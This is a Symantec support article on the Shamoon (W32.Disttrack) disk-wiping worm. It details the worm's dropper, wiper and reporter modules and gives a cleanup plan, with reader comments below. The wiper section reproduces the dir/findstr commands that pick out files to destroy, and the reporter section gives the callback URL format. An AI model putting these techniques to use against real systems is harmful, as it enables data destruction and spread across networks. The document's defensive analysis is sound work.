Endpoint Protection

 View Only

Support Perspective and Battle Plan - W32.Disttrack / W32.Disttrack.B (Shamoon) 2017 

Jan 27, 2017 12:55 PM

I. BACKGROUND:

Symantec is currently investigating reports of another new attack in the Middle East involving the destructive disk-wiping malware used by the Shamoon group (W32.DisttrackW32.Disttrack.B). Similar to previous attacks, the Disttrack malware used by Shamoon is just the destructive payload. It requires other means to be deployed on targeted organizations’ networks and is configured with previously stolen credentials. 

Symantec discovered the Greenbug cyberespionage group during its investigation into previous attacks involving W32.Disttrack.B (aka Shamoon). Shamoon (W32.Disttrack) first made headlines in 2012 when it was used in attacks against energy companies in Saudi Arabia. It recently resurfaced in November 2016 (W32.Disttrack.B), again attacking targets in Saudi Arabia. While these attacks were covered extensively in the media, how the attackers stole these credentials and introduced W32.Disttrack on targeted organizations’ networks remains a mystery.

Could Greenbug be responsible for getting Shamoon those stolen credentials?

Greenbug was discovered targeting a range of organizations in the Middle East including companies in the aviation, energy, government, investment, and education sectors. The group uses a custom information-stealing remote access Trojan (RAT) known as Trojan.Ismdoor as well as a selection of hacking tools to steal sensitive credentials from compromised organizations.

Although there is no definitive link between Greenbug and Shamoon, the group compromised at least one administrator computer within a Shamoon-targeted organization’s network prior to W32.Disttrack.B being deployed on November 17, 2016.

II. THREAT DETAILS:

The worm creates the following files:

  • %System%\trksrv.exe
  • %System%\netinit.exe
  • %System%\drivers\drdisk.sys
  • %System%\[NAME SELECTED FROM LIST].exe
    (see below for currently known list)

The worm deletes the following file:

  • %System%\drivers\drdisk.sys

The worm is comprised of several components:

  • Dropper: main component that drops other modules and is the first to infect the system
  • Wiper: module that contains destructive functionality
  • Reporter: module that reports infection information back to the attacker

The Dropper

The Dropper component has the following functionality:

  • Copies itself to %System%\trksrv.exe
  • Drops the following files embedded into resources:
    • 64-bit Dropper: %System%\trksrv.exe (contained in the “X509” resource)
    • Reporter module: %System%\netinit.exe (contained in the "PKCS7" resource)
    • Wiper module: %System%\[NAME SELECTED FROM LIST].exe (contained in the "PKCS12" resource)
      • Note: [NAME SELECTED FROM LIST] may be one of the following:
        • caclsrv
        • certutl
        • clean
        • ctrl
        • dfrag
        • dnslookup
        • dvdquery
        • event
        • extra ct
        • findfile
        • fsutl
        • gpget
        • iissrv
        • ipsecure
        • msinit
        • ntx
        • ntdsutl
        • ntfrsu til
        • ntnw
        • power
        • rdsadmin
        • regsys
        • routeman
        • rrasrv
        • sacses
        • sfmsc
        • sigver
        • smbinit
        • wcscript
    • Copies itself to the following network shares:
      • \\[COMPUTER NAME]\ADMIN$
      • \\[COMPUTER NAME]\C$\\WINDOWS
      • \\[COMPUTER NAME]\D$\\WINDOWS
      • \\[COMPUTER NAME]\E$\\WINDOWS
    • Creates a job task to execute itself
    • Creates the following service to start itself when Windows starts:
      • Service: TrkSvr
      • DisplayName: Distributed Link Tracking Server
      • ImagePath: %System%\trksvr.exe

The Wiper

The Wiper module has the following functionality:

  • Deletes the existing driver from the following location and writes a different legitimate driver embedded in resources:
    • %System%\drivers\drdisk.sys
  • The device driver is a clean disk driver that enables user-land applications to read and write to disk sectors. The driver is used to overwrite the computer's MBR but is not malicious by itself.
  • The file is digitally signed by “EldoS Corporation".
  • Executes the following commands that collect file names, which will be overwritten and writes them to f1.inf and f2.inf:
    • dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i download 2>nul >f1.inf
    • dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf
    • dir C:\Users\ /s /b /a:-D 2>nul | findstr -i download 2>nul >>f1.inf
    • dir C:\Users\ /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf
    • dir C:\Users\ /s /b /a:-D 2>nul | findstr -i picture 2>nul >>f1.inf
    • dir C:\Users\ /s /b /a:-D 2>nul | findstr -i video 2>nul >>f1.inf
    • dir C:\Users\ /s /b /a:-D 2>nul | findstr -i music 2>nul >>f1.inf
    • dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i desktop 2>nul >f2.inf
    • dir C:\Users\ /s /b /a:-D 2>nul | findstr -i desktop 2>nul >>f2.inf
    • dir C:\Windows\System32\Drivers /s /b /a:-D 2>nul >>f2.inf
    • dir C:\Windows\System32\Config /s /b /a:-D 2>nul | findstr -v -i systemprofile 2>nul >>f2.inf
  • Note: Files from f1.inf and f2.inf will be overwritten with a JPEG image that is located in the Wiper module. Overwritten files are rendered useless and cannot be repaired.
  • The module will overwrite the MBR so that the compromised computer can no longer boot.

The Reporter

The Reporter module is responsible for sending information about the infection to the attacker. Information is sent as an HTTP GET request and is structured as:

  • http://[DOMAIN]/ajax_modal/modal/data.asp?mydata=[MYDATA]&uid=[UID]&state=[STATE]

The following data is sent to the attacker:

  • [DOMAIN] = domain name
  • [MYDATA] = specifies how many files were overwritten
  • [UID] = IP address of the compromised computer
  • [STATE] = random number

How it spreads:

When the worm is executed, it copies itself to the following network shares:

  • \\[COMPUTER NAME]\ADMIN$
  • \\[COMPUTER NAME]\C$\\WINDOWS
  • \\[COMPUTER NAME]\D$\\WINDOWS
  • \\[COMPUTER NAME]\E$\\WINDOWS

Coverage:

Symantec Endpoint Protection:
Antivirus Signatures:

Intrusion Prevention Signatures:

 

Applying the 5 Steps of Virus Troubleshooting to a W32.Disttrack (Shamoon) Outbreak 
AKA 
The Shamoon Battle Plan

Step 1. Identify the threat

  • This means getting AV detection on any new (undetected) samples.

Step 2. Identify infected machines:

  • Machines with Auto-Protect alerts should be scanned with up-to-date definitions.
  • The entire network needs to be audited for unprotected machines, out of date machines, and infected or likely infected machines.
  • Traffic to known Shamoon domains is a good indicator of a potentially infected machine.
  • Protecting and managing fileservers is often the key to solving any outbreak scenario. - Unprotected NAS devices are at risk!

Step 3. Quarantine the infected/unprotected/under protected machines: 

  • Unprotected and under-protected machines need to be removed from the network until cleaned and protected.
  • Unprotected machines should be returned to the network only after being protected, checked for suspect files, and scanned clean.

Step 4. Clean the infected machines:

  • Infected machines need to be scanned clean. Safe Mode is not necessary, just a basic Full System Scan.
  • Don’t forget file servers. This bears repeating.
  • Watch scan logs closely for indications of “Reboot required” or results that indicate a potential issue like “Quarantine failed”

Step 5. Prevent future outbreaks:

  • AutoPlay is a spreading mechanism for thousands of worms and should be disabled. Microsoft has moved to this position as well.
  • An “Open Share” is any share that does not require a password to access. Password-restricting shares can slow or stop a worm like this in their tracks.
  • Remove write-access on shares from users not needing this level of access.
  • Maintain a strict patching regimen. Threats often add new capabilities in response to new vulnerabilities.
  • Once clean, upgrade to the newest version of SEP (Recommended: with all technologies installed).
  • Review mail server policies.

III. Questions and Answers

Q - How does this spread, once in the network?
A - Open administrator shares. Closing these shares, removing infected machines from the network, or dropping infected machines to a quarantined subnet will keep this from spreading. Enabling Network AutoProtect will also help.

Q - How did this get into my network?
A – There are preliminary indications that Greenbug could be responsible for delivering Shamoon.  The presence of Greenbug within an organization prior to the destructive attack involving W32.Disttrack.B provides only a tentative connection to Shamoon. Greenbug’s choice of targets and the fact that Ismdoor and associated tools downloaded by the threat appear to have gone quiet a day prior to the November 17, 2016 Shamoon attack is, however, suspicious. At this time, Symantec tracks these groups separately unless additional corroborating evidence emerges.  

Q - Will patching vulnerabilities help me stop this threat in my network?
A - No, vulnerabilities can be a door and the threat has already come in. These vulnerabilities should be patched ASAP (along with any other holes in the environment), but this will not counter an already-live infection.

Q - Are there URLs and Domains I should be blocking at the firewall?
A - Yes.  See Section II (The Reporter)

Q - What about Autorun?
A – The Shamoon variants observed haven’t been using this, however autoplay should be disabled either with a GPO or ADC policy, just in case.

IV. W32.DISTTRACK (SHAMOON) MITIGATION POSTURE

Note: This is not necessarily a checklist of everything you must do, but a way to understand where your environment may need to be scrutinized.

  • Autorun / AutoPlay Disabled?
  • Open File Shares Closed/Password Protected? Strong Passwords?
  • All Unprotected machines removed from the network and queued for updates/cleaning/protection?
  • Associated URLs blocked at the Perimeter Firewall / Client Firewall?
  • SEP AutoProtect set to load at System Startup?
  • SEP Network AutoProtect enabled?
  • Application and Device Control policy implemented (attached)?

V. REFERENCES:

 

VI. ATTACHMENTS

 

  • Block_Eldos_driver_v4.dat
    • ADC policy to block known versions of the Eldos driver used by Shamoon.

NOTE: Above ADC policy no longer needed, as we have released signature PUA.Disttrack!sys to protect machines from Shamoon proactively.

Statistics
0 Favorited
1 Views
1 Files
0 Shares
0 Downloads
Attachment(s)
zip file
Block_Eldos_driver_v4.zip   4 KB   1 version
Uploaded - Apr 10, 2020

Tags and Keywords

Comments

Feb 28, 2017 10:01 AM

Every time I read these kind of articles I wonder if the actual developer of the malware/ransomware/virus gets caught. Would be really interesting to see a statistic of the malware successfully delivered in the last decade sorted by the amount of damage they've done to the person/company/government and how many of them were actually traced back to a developer. Anyhow, the article above is quite detailed and doesn't seem to leave any gaps for administrators who want to ensure that they are protected against the mentioned malware.

Feb 27, 2017 03:05 AM

Great article and indepth info on the threat, with this article one can definitely have the idea on how to tackle if such situation arises and with the Custom policy suggested by Symantec it will be very easy....

Feb 25, 2017 08:26 AM

This is an excellent article and it should clear out most of the confusion anyone had on what Shamoon does and how it affects users' systems. Some of the things are so simple yet so destructive and so difficult to come back from.

It also shows how important it is to have better protection at "the front door".

Thank you to Symantec for the detailed analysis and protection!

Feb 24, 2017 04:56 AM

IT security is messed up with multiple solutions and resources. People dont think from technological angle and they depend soley on automation of the solution. Great efforts required to go through articles and implement those tiny points. 

Feb 17, 2017 06:10 PM

Always interesting to see what the latest threats are. Even better that we get information on how to avoid it. thanks symantec!

Feb 15, 2017 07:12 AM

What happened to hacks for the lulz? Wiping someone's drive seems pointless, but not if you're trying to destroy a company. It's not even financially motivated like cryptolocker. I like when Symantec shows exactly what the malware is doing to the file system. It helps in sandboxes to understand how it behaves.

Feb 15, 2017 05:55 AM

Huge write-up. This sort of IOC information is incredibly important. This kind of report will allow us to be kept on our foots and catch them before it gets worse. Technology is in place and need more operational attention.

Feb 14, 2017 04:07 PM

 Los detalles en profundidad son muy importantes para permitirnos "saber" lo que hace y seguirlo para resolver este problema. Este tipo de informe nos permitirá encontrar de una manera mucho mas sencilla los problemas a nuestro alcance.

 

Feb 14, 2017 10:42 AM

Good article with lots of useful information. Just goes to show you how advanced these threats are getting. Can always rely on Symantec to give us the latest information! 

Feb 13, 2017 09:53 AM

While I don't know all of the bits and bytes of this article it is nice to see such a detailed write up things.  Keep up the good work

Feb 10, 2017 04:05 AM

Good Information. One will get lost into this article. But its important that Symc is taking this much efforts giving detailed analysis to keep informed and secure. Need such help much more as todays world is full of threats and risks. Great going.

Feb 10, 2017 12:07 AM

Good Article. Dont know how many of will reach it carefully and use as Symantec has done their full efforts in publishing this. Many times just holding a solution is not useful but one must know how to user it with the help of OEM best practices.

Feb 09, 2017 01:42 AM

Nice Article release by symantec team also provide the full threat information with custom IPS policy, so risk propogation will be low.

 

Feb 08, 2017 10:33 AM

Very good reading.  I do really enjoy all the techinical aspect of the article.  

My company luckliy, while having offices in Suadi Arabia, has not been threatens with this malware.

Good to know that Symantecs definitions are now able to catch this and stop it before desstroying any data.

 

Feb 07, 2017 07:52 AM

Very interesting and detailed read, I hope more articles like these are released, it helps a lot.

Feb 07, 2017 05:22 AM

Another Great article. There's a lot of detail here which is great. This is very thorough and well done! This sort of report will allow us to be kept on our toes and catch them before it gets worse.  Also a good reminder to make sure everythings updatedand patched!

 

Feb 07, 2017 03:29 AM

Great Article by _DW.

This indepth analysis along with the ADC policy to block known versions of the Eldos driver used by Shamoon is going to assist lot of Symantec users.

Thank you for providing this.

Security means Symantec!!!

 

 

 

 

Feb 07, 2017 02:39 AM

Fully thorough article. Great Help. Q & A section is going to help Desktop guys who are working on the field and table on the users is gonna get a relief. Detailed analysis and remediation is very much useful. Thanks Symantec for securing us !!! You cares.

Feb 06, 2017 02:17 PM

I love seeing articles like this! Even though it looks like this particular threat will make it my way soon, it's great to have the knowledge. Patching up these holes proactively helps when they decide to sell there kit, too.

Feb 06, 2017 10:55 AM

Great article @Symantec!

It's crazy how we as IT people have to have dual roles in security, not saying that it's a terrible thing though.  However, it's good to see that @Symantec is making our jobs a little easier, as always.  :)

Feb 06, 2017 09:07 AM

Even old destructive code from 2012 is going to be useful on a target computer if it can get on the machine.  It doesn't matter how the credentials were obtained (social engineering, hacking etc.) this is still the 'front door'.  The sooner more companies embrace 2FA (fob or biometrics etc.) for auth then the less effective hacking and social engineering credential theft will be.

Feb 06, 2017 06:43 AM

Just another example as to what makes Symantec stand out from the competition. They just don't report on the malicious findings they also provide steps and information on how to avoid it as well as other important data.

Feb 06, 2017 05:56 AM

Great article these are really interesting. It's amazing how advanced these threats are getting. Also a nice reminder to make sure everything is patched and up to date!

Feb 06, 2017 03:53 AM

Another good article by Symante, with lots of useful information. As far as I can remember this is the first article detailing specific threat advisories, this sort of IOC information is very important. Also a good reminder to make sure everythings updatedand patched!

Feb 06, 2017 03:16 AM

More of this, please. The in-depth details are very importaint to allow for us to 'know' what it does and tracking it down to resolve this issue. This sort of report will allow us to be kept on our toes and catch them before it gets worse.

Thank you for sharing this.

Feb 06, 2017 02:50 AM

Another tedious malware. really a nice article with a lot of detailed information, it will be greatful for us. Though I have not seen or heard anyone that I know manages SEP reported such detection, this is a good reminder.

Feb 05, 2017 10:38 PM

I don't recall seeing specific threat advisories like this from Symantec.  This sort of IOC information is incredibly important!  This is very thorough and well done!  If there is any sort of distribution list for this data, please someone speak up!

Feb 05, 2017 04:43 PM

There's a lot of detail here which is great. Looking at the files placed and how it executes, we've already got everything in place that would stop this being able to create files and replicate. Will add this to the lists, as always, but a lot of best-practice should cripple this from the onset.

Feb 05, 2017 03:39 PM

Great article. The amount of detail and time put into it is amazing. This gives the incident responder a good ability to create YARA rules or even combine the ADC policy with their current one. Thanks for providing this, it is awesome!

Feb 05, 2017 02:23 PM

Another great read!!!
I like how you referenced the Honey Mooners even though I'm probably the only one here that knows it... Lots of good info for people to understand the different types of attacks and how to prevent them.

Related Entries and Links

No Related Resource entered.